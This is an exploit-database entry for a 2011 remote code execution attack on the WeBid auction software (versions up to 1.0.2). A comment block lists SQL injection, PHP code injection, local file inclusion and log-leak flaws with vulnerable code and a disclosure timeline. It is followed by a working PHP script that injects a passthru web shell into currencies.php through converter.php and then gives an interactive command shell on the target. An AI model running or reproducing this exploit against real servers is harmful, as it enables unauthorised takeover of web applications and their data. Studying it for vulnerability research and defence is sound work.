WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit

2011-07-04T00:00:00
ID 1337DAY-ID-16461
Type zdt
Reporter EgiX
Modified 2011-07-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            <?php
 
/*
 
    ------------------------------------------------------------
    WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit
    ------------------------------------------------------------
     
    author...: EgiX
    mail.....: n0b0d13s[at]gmail[dot]com
    link.....: http://www.webidsupport.com/
     
     
    This PoC was written for educational purpose. Use it at your own risk.
    Author will be not responsible for any damage.
     
     
    [-] Vulnerable code to SQL injection in feedback.php:
     
    154.    $query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";
    155.    $res = mysql_query($query);
    156.    $system->check_mysql($res, $query, __LINE__, __FILE__);
    157.    $item_title = mysql_result($res, 0, 'title');
     
    Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154.
 
    [-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:
 
    21. if (isset($_COOKIE['WEBID_RM_ID']))
    22. {
    23.         $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";
    24.         $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
    25.         setcookie('WEBID_RM_ID', '', time() - 3600);
    26. }
 
    Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.
 
     
    [-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:
 
    84.         if (isset($_COOKIE['WEBID_ONLINE']))
    85.         {
    86.             $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";
    87.             $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
    88.         }
 
    Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.
 
    [-] Vulnerable code to arbitrary PHP code jnjection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:
 
    61. function buildcache($newaarray)
    62. {
    63.         global $include_path;
    64.
    65.         $output_filename = $include_path . 'currencies.php';
    66.         $output = "<?php\n";
    67.         $output.= "\$conversionarray[] = '" . time() . "';\n";
    68.         $output.= "\$conversionarray[] = array(\n";
    69.
    70.         for ($i = 0; $i < count($newaarray); $i++)
    71.         {
    72.                 $output .= "\t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";
    73.                 if ($i < (count($newaarray) - 1))
    74.                 {
    75.                         $output .= ",\n";
    76.                 }
    77.                 else
    78.                 {
    79.                         $output .= "\n";
    80.                 }
    81.         }
    82.
    83.         $output .= ");\n?>\n";
    84.
    85.         $handle = fopen($output_filename, 'w');
    86.         fputs($handle, $output);
    87.         fclose($handle);
    88. }
 
    Input passed to buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being
    written to currencies.php file, this can lead to arbitrary PHP code injection.
 
    [-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:
 
    18. if (isset($_GET['lan']) && !empty($_GET['lan']))
    19. {
    20.         if ($user->logged_in)
    21.         {
    22.                 $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];
    23.         }
    24.         else
    25.         {
    26.                 // Set language cookie
    27.                 setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');
    28.         }
    29.         $language = $_GET['lan'];
    30. }
    31. elseif ($user->logged_in)
    32. {
    33.         $language = $user->user_data['language'];
    34. }
    35. elseif (isset($_COOKIE['USERLANGUAGE']))
    36. {
    37.         $language = $_COOKIE['USERLANGUAGE'];
    38. }
    39. else
    40. {
    41.         $language = $system->SETTINGS['defaultlanguage'];
    42. }
    43.
    44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];
    45.
    46. include $main_path . 'language/' . $language . '/messages.inc.php';
 
    Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before
 
    being used to include files on line 46. This can be exploited to include arbitrary local files.
 
    [-] Information leak vulnerability into /logs directory, cause anyone can read cron.log and error.log
 
 
    [-] Disclosure timeline:
 
    [19/06/2011] - Vulnerabilities discovered
    [19/06/2011] - Vendor contacted
    [20/06/2011] - Vendor contacted again
    [21/06/2011] - No response from vendor
    [21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34
    [22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1
    [22/06/2011] - Vendor responsed and released patches: http://www.webidsupport.com/forums/showthread.php?3892
    [04/07/2011] - Public disclosure
 
*/
 
error_reporting(E_ERROR);
set_time_limit(0);
 
if (!extension_loaded("curl")) die("cURL extension required\n");
 
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
 
function http_post($page, $data)
{  
    global $ch, $url;
     
    curl_setopt($ch, CURLOPT_URL, $url.$page);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
 
    return curl_exec($ch);
}
 
print "\n+----------------------------------------------------------------------+";
print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------+\n";
 
if ($argc < 2)
{
    print "\nUsage......: php $argv[0] <url>\n";
    print "\nExample....: php $argv[0] https://localhost/";
    print "\nExample....: php $argv[0] http://localhost/webid/\n";
    die();
}
 
$url = $argv[1];
 
$code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//");
http_post("converter.php", "action=convert&from=USD&to={$code}");
 
while(1)
{
    print "\nwebid-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");
}
?>



#  0day.today [2018-03-31]  #